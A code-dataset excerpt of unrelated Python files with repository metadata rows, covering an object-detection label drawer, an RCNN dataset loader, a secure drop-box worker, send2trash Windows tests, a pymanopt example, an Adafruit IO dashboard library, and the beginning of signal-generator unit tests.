label = '{} {:.2f}'.format(predicted_class, score)
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
label = label.encode('utf-8')
print(label)
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=self.colors[int(c)])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=self.colors[int(c)])
draw.text(text_origin, str(label, 'UTF-8'), fill=(0, 0, 0), font=font)
del draw
return image
def close(self):
self.sess.close() | 36.878571 | 126 | 0.544451 | 11,037 | 0.967479 | 0 | 0 | 184 | 0.016129 | 0 | 0 | 2,470 | 0.216515 |
a4f1059c2d04d205a4c5db81979affde7f3a6635 | 3,239 | py | Python | applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 46d2b7687b829778369fc6328170a7b14761e5c6 | [
"MIT"
] | 260 | 2019-11-18T01:50:00.000Z | 2022-03-28T23:08:53.000Z | applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 46d2b7687b829778369fc6328170a7b14761e5c6 | [
"MIT"
] | 27 | 2020-01-28T23:07:50.000Z | 2022-02-14T15:37:06.000Z | applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 46d2b7687b829778369fc6328170a7b14761e5c6 | [
"MIT"
] | 56 | 2019-11-18T02:13:12.000Z | 2022-02-28T14:36:09.000Z | # Copyright (c) 2021 Graphcore Ltd. All rights reserved.
# Copyright 2021 RangiLyu.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been modified by Graphcore Ltd.
import numpy as np
import torch
from .xml_dataset import XMLDataset
from utils import logger
if logger.GLOBAL_LOGGER is not None:
print = logger.GLOBAL_LOGGER.log_str
def calc_area(boxes):
# boxes: n,4
# return
x1, y1, x2, y2 = np.split(boxes, 4, 1)
areas = (y2 - y1) * (x2 - x1) # n,1
return areas[:, 0]
class XMLDatasetForRcnn(XMLDataset):
def __init__(self,
preset_indices=None,
area_filter_thrd=0.0,
num_gtboxes=20,
specified_length=None,
extra_layer=None,
**kwargs):
self.area_filter_thrd = area_filter_thrd
self.num_gtboxes = num_gtboxes
self.preset_indices = preset_indices
self._cur_for_preset_indices = 0
super(XMLDatasetForRcnn, self).__init__(**kwargs)
self.real_length = len(self.data_info)
self.length = self.real_length * 2 if specified_length is None else specified_length
self.extra_layer = extra_layer
def get_train_data(self, idx):
"""
Load image and annotation
:param idx:
:return: meta-data (a dict containing image, annotation and other information)
filter zero area boxes
"""
if self.preset_indices is None:
pass
else:
idx = self.preset_indices[self._cur_for_preset_indices]
self._cur_for_preset_indices += 1
idx = int(idx % self.real_length)
meta = super().get_train_data(idx)
# filter boxes and labels by area
areas = calc_area(meta['gt_bboxes'])
mask = areas > self.area_filter_thrd
meta['gt_bboxes'] = meta['gt_bboxes'][mask, :]
meta['gt_labels'] = meta['gt_labels'][mask]
meta['db_inds'] = idx
#
# pad boxes and inds
boxes = np.zeros((self.num_gtboxes, 4)).astype(np.float32)
num_boxes = meta['gt_bboxes'].shape[0]
boxes[:num_boxes, :] = meta['gt_bboxes'][:self.num_gtboxes]
meta['gt_bboxes'] = torch.from_numpy(boxes)
labels = np.asarray([0] * self.num_gtboxes)
labels[:num_boxes] = meta['gt_labels'][:self.num_gtboxes]
meta['gt_labels'] = torch.from_numpy(labels)
meta['num_boxes'] = num_boxes
if num_boxes == 0:
return None # return None will re-run this function
# proc data in extra layer
if self.extra_layer is not None:
meta = self.extra_layer(meta)
return meta
def __len__(self):
return self.length
| 33.391753 | 92 | 0.637851 | 2,223 | 0.686323 | 0 | 0 | 0 | 0 | 0 | 0 | 1,124 | 0.347021 |
a4f1604ce9428d0115f6455fe8e1046bdd00fa11 | 5,910 | py | Python | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2019-01-21T12:41:40.000Z | 2019-01-21T12:41:40.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2017-12-27T18:13:30.000Z | 2018-01-26T11:44:35.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | null | null | null | import click
from os import path, listdir, rename, remove
from datetime import datetime
from sys import exit
from multiprocessing import Pool
from signal import signal, SIGINT
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from threading import Condition
from .dropbox import DropboxContainer
class MyHandler(FileSystemEventHandler):
def __init__(self, main_loop_cond):
self.main_loop_cond = main_loop_cond
def on_modified(self, event):
self.main_loop_cond.acquire()
self.main_loop_cond.notify()
self.main_loop_cond.release()
def keyboard_interrupt_handler(signal, frame):
print 'Caught keyboard interrupt. Exit.'
exit(0)
def run_watchdog():
# once a day we should scan for old drop boxes
# at noon we should test pgp keys
# also: scan for and clean up watchdog entries
pass
def process_drop(drop):
try:
rename(
path.join(drop.container.fs_submission_queue, drop.drop_id),
path.join(drop.container.fs_scratch, drop.drop_id)
)
except:
return
drop.process()
# remove token from scratch dir, we're done
remove(path.join(drop.container.fs_scratch, drop.drop_id))
@click.command(help='performs sanity and config checks and cleans up old drops')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
def janitor(root): # pragma: no cover
drop_root = root = DropboxContainer(root=root)
# Scan pub keys for expired or soon to expired ones
allkeys = root.gpg_context.list_keys()
now = datetime.utcnow()
report = ''
for editor in drop_root.settings['editors']:
key = [k for k in allkeys if editor in ', '.join(k['uids'])]
if not bool(key):
report = report + 'Editor %s does not have a public key in keyring.\n' % editor
continue
key = key[0]
if not key.get('expires'):
report = report + 'Editor %s has a key that never expires.\n' % editor
continue
keyexpiry = datetime.utcfromtimestamp(int(key['expires']))
delta = keyexpiry - now
if delta.days < 0:
report = report + 'Editor %s has an expired key.\n' % editor
elif delta.days < 60:
report = report + 'Editor ' + editor + ' has a key that will expire in %d days.\n' % delta.days
for drop in drop_root:
age = now - drop.last_changed()
max_age = 365 if not drop.from_watchdog else 1
if age.days > max_age:
if not drop.from_watchdog:
print('drop %s is expired. Removing it.' % drop)
drop.destroy()
@click.command(help='debug processing of drops')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
@click.argument(
'drop_id',
required=False,
default=None,
)
def debug(root, drop_id=None): # pragma: no cover
drop_root = root = DropboxContainer(root=root)
if drop_id is not None:
drops = [drop_root.get_dropbox(drop_id)]
else:
drops = drop_root
for drop in drops:
print('debugging %s' % drop)
if drop.status_int == 20:
drop.process()
@click.command(help='Scans dropbox submission directory for unprocessed drops and processes them')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
def debug_worker(root): # pragma: no cover
drop_root = DropboxContainer(root=root)
while True:
for drop_id in listdir(drop_root.fs_submission_queue):
print(drop_id)
drop = drop_root.get_dropbox(drop_id)
# Only look at drops that actually are for us
if drop.status_int == 20:
process_drop(drop)
else:
print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
@click.command(help='listens for changes to submission directory and processes them asynchronously')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
@click.option(
'--async/--no-async',
default=True,
help='''process asynchronously''')
def worker(root, async=True): # pragma: no cover
drop_root = DropboxContainer(root=root)
settings = drop_root.settings
# Setup multiprocessing pool with that amount of workers as
# implied by the amount of worker jails
if async:
workers = Pool(processes=settings.get('num_workers', 1))
# Setup the condition object that we will wait for, it
# signals changes in the directory
condition = Condition()
# Setup and run the actual file system event watcher
event_handler = MyHandler(condition)
observer = Observer()
observer.schedule(event_handler, drop_root.fs_submission_queue, recursive=False)
observer.start()
signal(SIGINT, keyboard_interrupt_handler)
# grab lock, scan submission dir for jobs and process them
condition.acquire()
while True:
for drop_id in listdir(drop_root.fs_submission_queue):
print(drop_id)
drop = drop_root.get_dropbox(drop_id)
# Only look at drops that actually are for us
if drop.status_int == 20:
# process drops without attachments synchronously
if async and drop.num_attachments > 0:
workers.map_async(process_drop, [drop])
else:
process_drop(drop)
else:
print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
# Wait for directory content to change
condition.wait()
condition.release()
| 30.942408 | 107 | 0.642978 | 274 | 0.046362 | 0 | 0 | 4,650 | 0.786802 | 0 | 0 | 1,765 | 0.298646 |
a4f36624a0ebfb5fad3f19befd7baacdcb07a66d | 4,703 | py | Python | tests/test_plat_win.py | juliangilbey/send2trash | 2eb3242cd9c646174d88e71e4a5dd503f5001c94 | [
"BSD-3-Clause"
] | null | null | null | tests/test_plat_win.py | juliangilbey/send2trash | 2eb3242cd9c646174d88e71e4a5dd503f5001c94 | [
"BSD-3-Clause"
] | null | null | null | tests/test_plat_win.py | juliangilbey/send2trash | 2eb3242cd9c646174d88e71e4a5dd503f5001c94 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
import os
import shutil
import sys
import unittest
from os import path as op
from tempfile import gettempdir
from send2trash import send2trash as s2t
# import the two versions as well as the "automatic" version
from send2trash.plat_win_modern import send2trash as s2t_modern
from send2trash.plat_win_legacy import send2trash as s2t_legacy
@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestNormal(unittest.TestCase):
def setUp(self):
self.dirname = "\\\\?\\" + op.join(gettempdir(), "python.send2trash")
self.file = op.join(self.dirname, "testfile.txt")
self._create_tree(self.file)
self.files = [
op.join(self.dirname, "testfile{}.txt".format(index)) for index in range(10)
]
[self._create_tree(file) for file in self.files]
def tearDown(self):
shutil.rmtree(self.dirname, ignore_errors=True)
def _create_tree(self, path):
dirname = op.dirname(path)
if not op.isdir(dirname):
os.makedirs(dirname)
with open(path, "w") as writer:
writer.write("send2trash test")
def _trash_file(self, fcn):
fcn(self.file)
self.assertFalse(op.exists(self.file))
def _trash_multifile(self, fcn):
fcn(self.files)
self.assertFalse(any([op.exists(file) for file in self.files]))
def _file_not_found(self, fcn):
file = op.join(self.dirname, "otherfile.txt")
self.assertRaises(WindowsError, fcn, file)
def test_trash_file(self):
self._trash_file(s2t)
def test_trash_multifile(self):
self._trash_multifile(s2t)
def test_file_not_found(self):
self._file_not_found(s2t)
def test_trash_file_modern(self):
self._trash_file(s2t_modern)
def test_trash_multifile_modern(self):
self._trash_multifile(s2t_modern)
def test_file_not_found_modern(self):
self._file_not_found(s2t_modern)
def test_trash_file_legacy(self):
self._trash_file(s2t_legacy)
def test_trash_multifile_legacy(self):
self._trash_multifile(s2t_legacy)
def test_file_not_found_legacy(self):
self._file_not_found(s2t_legacy)
@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestLongPath(unittest.TestCase):
def setUp(self):
self.functions = {s2t: "auto", s2t_legacy: "legacy", s2t_modern: "modern"}
filename = "A" * 100
self.dirname = "\\\\?\\" + op.join(gettempdir(), filename)
path = op.join(
self.dirname,
filename,
filename, # From there, the path is not trashable from Explorer
filename,
filename + "{}.txt",
)
self.file = path.format("")
self._create_tree(self.file)
self.files = [path.format(index) for index in range(10)]
[self._create_tree(file) for file in self.files]
def tearDown(self):
shutil.rmtree(self.dirname, ignore_errors=True)
def _create_tree(self, path):
dirname = op.dirname(path)
if not op.isdir(dirname):
os.makedirs(dirname)
with open(path, "w") as writer:
writer.write("Looong filename!")
def _trash_file(self, fcn):
fcn(self.file)
self.assertFalse(op.exists(self.file))
def _trash_multifile(self, fcn):
fcn(self.files)
self.assertFalse(any([op.exists(file) for file in self.files]))
def _trash_folder(self, fcn):
fcn(self.dirname)
self.assertFalse(op.exists(self.dirname))
def test_trash_file(self):
self._trash_file(s2t)
def test_trash_multifile(self):
self._trash_multifile(s2t)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder(self):
self._trash_folder(s2t)
def test_trash_file_modern(self):
self._trash_file(s2t_modern)
def test_trash_multifile_modern(self):
self._trash_multifile(s2t_modern)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder_modern(self):
self._trash_folder(s2t_modern)
def test_trash_file_legacy(self):
self._trash_file(s2t_legacy)
def test_trash_multifile_legacy(self):
self._trash_multifile(s2t_legacy)
@unittest.skipIf(
op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
"Cannot trash long path from other drive",
)
def test_trash_folder_legacy(self):
self._trash_folder(s2t_legacy)
| 30.341935 | 88 | 0.652775 | 4,224 | 0.89815 | 0 | 0 | 4,340 | 0.922815 | 0 | 0 | 451 | 0.095896 |
a4f3cb4f3427bfd4ee51df95f9cda15b80ddc419 | 1,133 | py | Python | examples/closest_unit_norm_column_approximation.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | examples/closest_unit_norm_column_approximation.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | examples/closest_unit_norm_column_approximation.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import theano.tensor as T
from numpy import linalg as la, random as rnd
import pymanopt
from pymanopt.manifolds import Oblique
from pymanopt.solvers import ConjugateGradient
def closest_unit_norm_column_approximation(A):
"""
Returns the matrix with unit-norm columns that is closests to A w.r.t. the
Frobenius norm.
"""
m, n = A.shape
manifold = Oblique(m, n)
solver = ConjugateGradient()
X = T.matrix()
@pymanopt.function.Theano(X)
def cost(X):
return 0.5 * T.sum((X - A) ** 2)
problem = pymanopt.Problem(manifold, cost=cost)
return solver.solve(problem)
if __name__ == "__main__":
# Generate random problem data.
m = 5
n = 8
A = rnd.randn(m, n)
# Calculate the actual solution by normalizing the columns of A.
X = A / la.norm(A, axis=0)[np.newaxis, :]
# Solve the problem with pymanopt.
Xopt = closest_unit_norm_column_approximation(A)
# Print information about the solution.
print('')
print("solution found: %s" % np.allclose(X, Xopt, rtol=1e-3))
print("Frobenius-error: %f" % la.norm(X - Xopt))
| 25.177778 | 78 | 0.662842 | 0 | 0 | 0 | 0 | 86 | 0.075905 | 0 | 0 | 331 | 0.292145 |
a4f4c9000cc124929e416388dbabf46666c286f5 | 9,821 | py | Python | adafruit_dash_display.py | adafruit/Adafruit_CircuitPython_Dash_Display | db7a1113c00e11c0a2d35ceb425cbb057b07ba61 | [
"Unlicense",
"MIT-0",
"MIT"
] | 2 | 2021-05-14T18:39:47.000Z | 2022-03-19T16:08:53.000Z | adafruit_dash_display.py | adafruit/Adafruit_CircuitPython_Dash_Display | db7a1113c00e11c0a2d35ceb425cbb057b07ba61 | [
"Unlicense",
"MIT-0",
"MIT"
] | 1 | 2021-09-27T17:36:56.000Z | 2021-09-27T17:36:56.000Z | adafruit_dash_display.py | adafruit/Adafruit_CircuitPython_Dash_Display | db7a1113c00e11c0a2d35ceb425cbb057b07ba61 | [
"Unlicense",
"MIT-0",
"MIT"
] | 3 | 2021-05-18T11:34:49.000Z | 2022-02-18T03:33:49.000Z | # SPDX-FileCopyrightText: Copyright (c) 2021 Dylan Herrada for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_dash_display`
================================================================================
CircuitPython library for creating Adafruit IO dashboards.
* Author(s): Dylan Herrada
Implementation Notes
--------------------
**Hardware:**
* This library currently only officially supports the
`Adafruit Funhouse <https://www.adafruit.com/product/4985>`_ but other boards are coming soon.
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import time
from collections import OrderedDict
from adafruit_display_shapes.rect import Rect
from adafruit_display_text.label import Label
import displayio
import terminalio
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Dash_Display.git"
class Feed:
""" Feed object to make getting and setting different feed properties easier """
def __init__(
self, key, default_text, formatted_text, callback, color, pub, index
): # pylint: disable=too-many-arguments
self._key = key
self.default_text = default_text
self._text = formatted_text
self._callback = callback
self._color = color
self._pub = pub
self.index = index
self._last_val = None
@property
def key(self):
""" Getter for feed key. Will give the value of the feed key"""
return self._key
@key.setter
def key(self, value):
""" Setter for feed key. Sets a new value for the feed key property _key"""
self._key = value
@property
def text(self):
""" Getter for text ready to be formatted. Will give the feed text"""
return self._text
@text.setter
def text(self, value):
""" Setter for text ready to be formatted. Allows to change the feed text"""
self._text = value
@property
def callback(self):
""" Getter for callback function. Returns the feed callback"""
return self._callback
@callback.setter
def callback(self, value):
""" Setter for callback function. Changes the feed callback """
self._callback = value
@property
def color(self):
""" Getter for text color callback function. Will return the color for the feed"""
return self._color
@color.setter
def color(self, value):
""" Setter for text color callback function """
self._color = value
@property
def pub(self):
""" Getter for publish function, called when a new value is published by this library. """
return self._pub
@pub.setter
def pub(self, value):
""" Setter for publish function """
self._pub = value
@property
def last_val(self):
""" Getter for the last value received """
return self._last_val
@last_val.setter
def last_val(self, value):
""" Setter for last received value """
self._last_val = value
class Hub: # pylint: disable=too-many-instance-attributes
""" Object that lets you make an IOT dashboard """
def __init__(self, display, io, nav):
self.display = display
self.io = io # pylint: disable=invalid-name
self.up_btn, self.select, self.down, self.back, self.submit = nav
self.length = 0
self.selected = 1
self.feeds = OrderedDict()
self.io.on_mqtt_connect = self.connected
self.io.on_mqtt_disconnect = self.disconnected
self.io.on_mqtt_subscribe = self.subscribe
self.io.on_message = self.message
print("Connecting to Adafruit IO...")
io.connect()
self.display.show(None)
self.splash = displayio.Group()
self.rect = Rect(0, 0, 240, 30, fill=0xFFFFFF)
self.splash.append(self.rect)
self.display.show(self.splash)
def simple_text_callback(
self, client, feed_id, message
): # pylint: disable=unused-argument
"""Default callback function that uses the text in the Feed object and the color callback
to set the text"""
feed_id = feed_id.split("/")[-1]
feed = self.feeds[feed_id]
try:
text = feed.text.format(message)
except ValueError:
text = feed.text.format(float(message))
return text
def update_text(self, client, feed_id, message):
""" Updates the text on the display """
feed = self.feeds[feed_id]
feed.callback(client, feed_id, message)
self.splash[feed.index + 1].text = feed.callback(client, feed_id, str(message))
if feed.color:
self.splash[feed.index + 1].color = feed.color(message)
def base_pub(self, var):
""" Default function called when a feed is published to """
def add_device(
self,
feed_key,
default_text=None,
formatted_text=None,
color_callback=None,
callback=None,
pub_method=None,
): # pylint: disable=too-many-arguments
""" Adds a feed/device to the UI """
if not callback:
callback = self.simple_text_callback
if not pub_method:
pub_method = self.base_pub
if not formatted_text:
formatted_text = f"{feed_key} : "
formatted_text = formatted_text + "{}"
if not default_text:
default_text = feed_key
self.io.subscribe(feed_key)
if len(self.splash) == 1:
self.splash.append(
Label(
font=terminalio.FONT,
text=default_text,
x=3,
y=15,
anchored_position=(3, 15),
scale=2,
color=0x000000,
)
)
else:
self.splash.append(
Label(
font=terminalio.FONT,
x=3,
y=((len(self.splash) - 1) * 30) + 15,
text=default_text,
color=0xFFFFFF,
anchored_position=(3, ((len(self.splash) - 2) * 30) + 15),
scale=2,
)
)
self.length = len(self.splash) - 2
self.feeds[feed_key] = Feed(
key=feed_key,
default_text=default_text,
formatted_text=formatted_text,
callback=callback,
color=color_callback,
pub=pub_method,
index=len(self.feeds),
)
def get(self):
""" Gets all the subscribed feeds """
for feed in self.feeds.keys():
print(f"getting {feed}")
self.io.get(feed)
time.sleep(0.1)
self.io.loop()
# pylint: disable=unused-argument
@staticmethod
def connected(client):
""" Callback for when the device is connected to Adafruit IO """
print("Connected to Adafruit IO!")
@staticmethod
def subscribe(client, userdata, topic, granted_qos):
""" Callback for when a new feed is subscribed to """
print("Subscribed to {0} with QOS level {1}".format(topic, granted_qos))
@staticmethod
def disconnected(client):
""" Callback for when the device disconnects from Adafruit IO """
print("Disconnected from Adafruit IO!")
def message(self, client, feed_id, message):
""" Callback for whenever a new message is received """
print("Feed {0} received new value: {1}".format(feed_id, message))
feed_id = feed_id.split("/")[-1]
feed = self.feeds[feed_id]
feed.last_val = message
self.update_text(client, feed_id, str(message))
def publish(self, feed, message):
""" Callback for publishing a message """
print(f"Publishing {message} to {feed}")
self.io.publish(feed, message)
def loop(self):
""" Loops Adafruit IO and also checks to see if any buttons have been pressed """
self.io.loop()
if self.select.value:
feed = self.feeds[list(self.feeds.keys())[self.selected - 1]]
if feed.pub:
feed.pub(feed.last_val)
self.display.show(self.splash)
while self.select.value:
pass
if self.down.value and self.selected < self.length + 1:
rgb = self.splash[self.selected].color
color = (
((255 - ((rgb >> 16) & 0xFF)) << 16)
+ ((255 - ((rgb >> 8) & 0xFF)) << 8)
+ (255 - (rgb & 0xFF))
)
self.splash[self.selected].color = color
self.rect.y += 30
self.selected += 1
rgb = self.splash[self.selected].color
color = (
((255 - ((rgb >> 16) & 0xFF)) << 16)
+ ((255 - ((rgb >> 8) & 0xFF)) << 8)
+ (255 - (rgb & 0xFF))
)
self.splash[self.selected].color = color
if self.up_btn.value and self.selected > 1:
rgb = self.splash[self.selected].color
color = (
((255 - ((rgb >> 16) & 0xFF)) << 16)
+ ((255 - ((rgb >> 8) & 0xFF)) << 8)
+ (255 - (rgb & 0xFF))
)
self.splash[self.selected].color = color
self.rect.y -= 30
self.selected -= 1
rgb = self.splash[self.selected].color
color = (
((255 - ((rgb >> 16) & 0xFF)) << 16)
+ ((255 - ((rgb >> 8) & 0xFF)) << 8)
+ (255 - (rgb & 0xFF))
)
self.splash[self.selected].color = color
| 31.376997 | 98 | 0.558904 | 8,855 | 0.901639 | 0 | 0 | 2,145 | 0.21841 | 0 | 0 | 2,720 | 0.276958 |
a4f76b804fae0302852d3bd4593e94302e1fe66e | 34,936 | py | Python | fygen_test.py | vanish125/DS1054_BodePlotter | 569d3b97d8a0a657dd27d7b30b152fa78203995b | [
"MIT"
] | null | null | null | fygen_test.py | vanish125/DS1054_BodePlotter | 569d3b97d8a0a657dd27d7b30b152fa78203995b | [
"MIT"
] | null | null | null | fygen_test.py | vanish125/DS1054_BodePlotter | 569d3b97d8a0a657dd27d7b30b152fa78203995b | [
"MIT"
] | 1 | 2022-01-18T16:58:18.000Z | 2022-01-18T16:58:18.000Z | """Unit tests for fygen module."""
import unittest
import six
import fygen
import fygen_help
from wavedef import SUPPORTED_DEVICES
# pylint: disable=too-many-public-methods
# pylint: disable=invalid-name
# pylint: disable=too-many-lines
class FakeSerial(object):
"""Fake serial object for when more interaction is required."""
def __init__(self, read_lines):
self.read_lines = read_lines
self.write_lines = []
def getvalue(self):
return ''.join(self.write_lines)
def write(self, line):
self.write_lines.append(line.decode('utf8'))
# pylint: disable=unused-argument
# pylint: disable=no-self-use
def flush(self):
pass
def read(self, unused_length):
return '\n'
def reset_input_buffer(self):
pass
def reset_output_buffer(self):
pass
def read_until(self, terminator='\n', size=0):
"""fake read_until method."""
r = self.read_lines[0]
del self.read_lines[0]
return r
# pylint: enable=unused-argument
# pylint: enable=no-self-use
class TestFYGen(unittest.TestCase):
"""Test harness for FYGen."""
def setUp(self):
self.output = six.StringIO()
self.fy = fygen.FYGen(
port=self.output,
init_state=False,
device_name='fy2300',
)
def tearDown(self):
self.fy.close()
def test_help(self):
"""Asserts that all help sections render."""
for section in range(len(fygen_help.SECTIONS)):
fygen.help(section, fout=self.output)
self.assertIn('Other Help Sections', self.output.getvalue())
def test_help_device(self):
"""Tests calling help with a device name."""
for section in range(len(fygen_help.SECTIONS)):
fygen.help(section, 'fy2300', self.output)
self.assertIn('Other Help Sections', self.output.getvalue())
def test_help_invalid_section(self):
"""Provides an invalid help section number."""
with self.assertRaises(fygen.HelpError):
fygen.help(len(fygen_help.SECTIONS))
def test_get_version(self):
"""Tests the version command."""
self.assertEqual(1.0, fygen.get_version())
def test_autoset(self):
"""Tests autoset functionality."""
fy = fygen.FYGen(port=self.output)
fy.set((0, 1))
val = self.output.getvalue()
self.assertIn('WMN0\n', val)
self.assertIn('WFN0\n', val)
def test_autoset_with_args(self):
"""Tests autoset with additional arguments provided."""
fy = fygen.FYGen(port=self.output)
fy.set(wave='square', volts=0.1)
val = self.output.getvalue()
self.assertIn('WMW01\n', val)
self.assertIn('WMA0.10\n', val)
def test_send(self):
"""Tests the low-level send."""
fs = FakeSerial([b'foo\n', b'bar\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('foo', fy.send('foocmd'))
self.assertEqual('bar', fy.send('barcmd'))
self.assertEqual('foocmd\nbarcmd\n', fs.getvalue())
def test_send_too_short(self):
"""Provides a command that is too short."""
with self.assertRaises(fygen.CommandTooShortError):
self.fy.send('FO')
def test_set_enable(self):
"""Enables generator on both channels."""
self.fy.set(channel=(0, 1), volts=3, enable=True)
self.assertEqual(
'WMA3.00\n'
'WMN1\n'
'WFA3.00\n'
'WFN1\n',
self.output.getvalue())
def test_already_enabled(self):
"""Tests WMN1 is not sent if the channel is already enabled."""
fs = FakeSerial([b'1\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, enable=True)
self.assertEqual('RMN\n', fs.getvalue())
def test_set_disable(self):
"""Tests disable function on both channels."""
fy = fygen.FYGen(port=self.output, default_channel=(0, 1), init_state=False)
fy.set(volts=3, enable=False)
self.assertEqual(
'WMN0\n'
'WMA3.00\n'
'WFN0\n'
'WFA3.00\n',
self.output.getvalue())
def test_already_disabled(self):
"""Tests that WMN0 is not sent if the channel is already disabled."""
fs = FakeSerial([b'0\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, enable=False)
self.assertEqual('RMN\n', fs.getvalue())
def test_invalid_channel(self):
"""Passes an invalid channel."""
with self.assertRaises(fygen.InvalidChannelError):
self.fy.set(channel=2)
def test_set_wave1(self):
"""Sets current wave by name."""
self.fy.set(wave='sin')
self.fy.set(channel=1, wave='square')
self.assertEqual(
'WMW00\n'
'WFW01\n',
self.output.getvalue())
def test_set_wave2(self):
"""Sets current wave by number."""
self.fy.set(wave=46)
self.assertEqual('WMW46\n', self.output.getvalue())
def test_wave_already_set(self):
"""Asserts a wave that is already square is not reset to square."""
fs = FakeSerial([b'1\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, wave='square')
self.assertEqual('RMW\n', fs.getvalue())
def test_unknown_wave(self):
"""Passes an unknown waveform name."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set(wave='foo')
def test_invalid_wave_index(self):
"""Passes an invalid waveform index."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set(wave=-1)
def test_set_freq1(self):
"""Sets a frequency using freq_hz."""
self.fy.set(freq_hz=5000)
self.fy.set(channel=1, freq_hz=1e6)
self.assertEqual(
'WMF00005000000000\n'
'WFF01000000000000\n',
self.output.getvalue())
def test_set_freq2(self):
"""Sets a frequency using freq_uhz."""
self.fy.set(freq_uhz=5000)
self.fy.set(channel=1, freq_uhz=1e6)
self.assertEqual(
'WMF00000000005000\n'
'WFF00000001000000\n',
self.output.getvalue())
def test_freq_already_set1(self):
"""Tests that a frequency is not reset to the same thing."""
fs = FakeSerial([b'12345\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, freq_hz=12345)
self.assertEqual('RMF\n', fs.getvalue())
def test_freq_already_set2(self):
"""Tests that a frequency is not reset to the same thing."""
fs = FakeSerial([b'1234.5\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, freq_uhz=1234500000)
self.assertEqual('RMF\n', fs.getvalue())
def test_set_both_frequencies(self):
"""Tries passing both freq_hz and freq_uhz."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_hz=4000, freq_uhz=5000)
def test_invalid_freq1(self):
"""Tries passing a negative frequency (freq_hz version)."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_hz=-1)
def test_invalid_freq2(self):
"""Tries passing a negative frequency (freq_uhz version)."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_uhz=-1)
def test_set_volts(self):
"""Sets voltage amplitude on both channels."""
self.fy.set(volts=10)
self.fy.set(channel=1, volts=0)
self.assertEqual(
'WMA10.00\n'
'WFA0.00\n',
self.output.getvalue())
def test_volts_already_set(self):
"""Tries to set the voltage to an already set value."""
fs = FakeSerial([b'56000\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, volts=5.6)
self.assertEqual('RMA\n', fs.getvalue())
def test_volts_too_low(self):
"""Tries to set the voltage to a negative value."""
fy = fygen.FYGen(port=self.output)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=-0.1)
def test_volts_too_high(self):
"""Tries to set the voltage higher than the allowed maximum."""
fy = fygen.FYGen(port=self.output, max_volts=1.5)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=1.6)
def test_duty_cycle(self):
"""Sets the duty cycle on both channels."""
self.fy.set(duty_cycle=0.5)
self.fy.set(channel=1, duty_cycle=0.9)
self.assertEqual(
'WMD50.0\n'
